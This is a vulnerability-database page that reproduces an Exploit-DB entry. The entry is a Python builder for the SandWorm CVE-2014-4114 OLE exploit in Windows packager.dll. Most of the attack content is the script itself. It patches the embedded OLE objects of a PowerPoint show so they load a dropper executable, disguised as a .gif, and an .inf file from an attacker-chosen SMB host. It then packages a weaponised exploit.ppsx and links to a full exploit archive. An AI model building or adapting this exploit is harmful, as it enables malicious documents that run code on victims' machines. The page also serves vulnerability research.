Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows - OLE Package Manager SandWorm

🗓️ 20 Oct 2014 00:00:00Reported by Vlad OvtchinikovType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 118 Views

Poc exploit builder for OLE flaw in packager.dll [CVE-2014-4114

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit
18 Oct 201400:00
zdt
0day.today		Windows OLE Package Manager SandWorm Exploit
21 Oct 201400:00
zdt
0day.today		MS14-064 Microsoft Windows OLE Package Manager Code Execution Exploit
16 Nov 201400:00
zdt
ATTACKERKB		CVE-2014-4114
27 Jul 202100:00
attackerkb
ATTACKERKB		Microsoft Internet Explorer Use-After-Free Vulnerability
15 Oct 201400:00
attackerkb
Circl		CVE-2014-4114
14 Oct 201410:29
circl
CISA KEV Catalog		Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
3 Mar 202200:00
cisa_kev
Check Point Advisories		Microsoft Windows OLE Remote Code Execution (MS14-060; CVE-2014-4114; CVE-2014-6352)
14 Oct 201400:00
checkpoint_advisories
Check Point Advisories		Microsoft Windows OLE Remote Code Execution (MS14-060) - ver 2 (CVE-2014-4114; CVE-2014-6352)
19 Oct 201400:00
checkpoint_advisories
CVE		CVE-2014-4114
15 Oct 201410:00
cve
Rows per page
#!/usr/bin/env python
import os
import zipfile
import sys

'''
Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35019.tar.gz

Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit  - Microsoft Offcie 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same  dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip

e.g.  python cve-2014-4114.py 10.0.0.233 rdb xxx.exe
10.0.0.233 - ip
rdb - share
xxx.exe - dropper
'''
host=sys.argv[1]
share=sys.argv[2]
mal_file=sys.argv[3]

print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by [email protected] @v1ad_o\n"
print "Building ... \n "

# extract the original .ppsx PoC
mal_file= mal_file.replace(' ', '')[:-4].lower()
fh = open('expl.zip', 'rb')
z = zipfile.ZipFile(fh)
for name in z.namelist():
    outpath = "./tmp"
    z.extract(name, outpath)
fh.close()

os.mkdir('out')
os.chdir('tmp')

# oleObject1.bin mod for GIF
infile = open('ppt/embeddings/oleObject1.bin')
outfile = open('ppt/embeddings/1.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.gif':mal_file+'.gif'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject1.bin')
os.rename ('ppt/embeddings/1.bin','ppt/embeddings/oleObject1.bin')

# oleObject2.bin mod for INF
infile = open('ppt/embeddings/oleObject2.bin')
outfile = open('ppt/embeddings/2.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.inf':mal_file+'.inf'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()

os.remove ('ppt/embeddings/oleObject2.bin')
os.rename ('ppt/embeddings/2.bin','ppt/embeddings/oleObject2.bin')
os.system("zip -q  -9 -r  ../out/exploit.ppsx * ")
os.chdir('..')

# oleObject2.bin mod for INF prep
infile = open('expl.inf')
outfile = open('out/'+mal_file+'.inf','w')
replacements = {'slide1':mal_file}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.system("rm -rf tmp")

print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.gif\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.inf\n'
print 'Done - collect your files from the [out] folder.\n'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Oct 2014 00:00Current
8High risk
Vulners AI Score8
CVSS 29.3
CVSS 3.17.8
EPSS0.9236
SSVC
microsoft windowsole package managersandwormexploitcve-2014-4114packager.dllmicrosoft officegifinf
118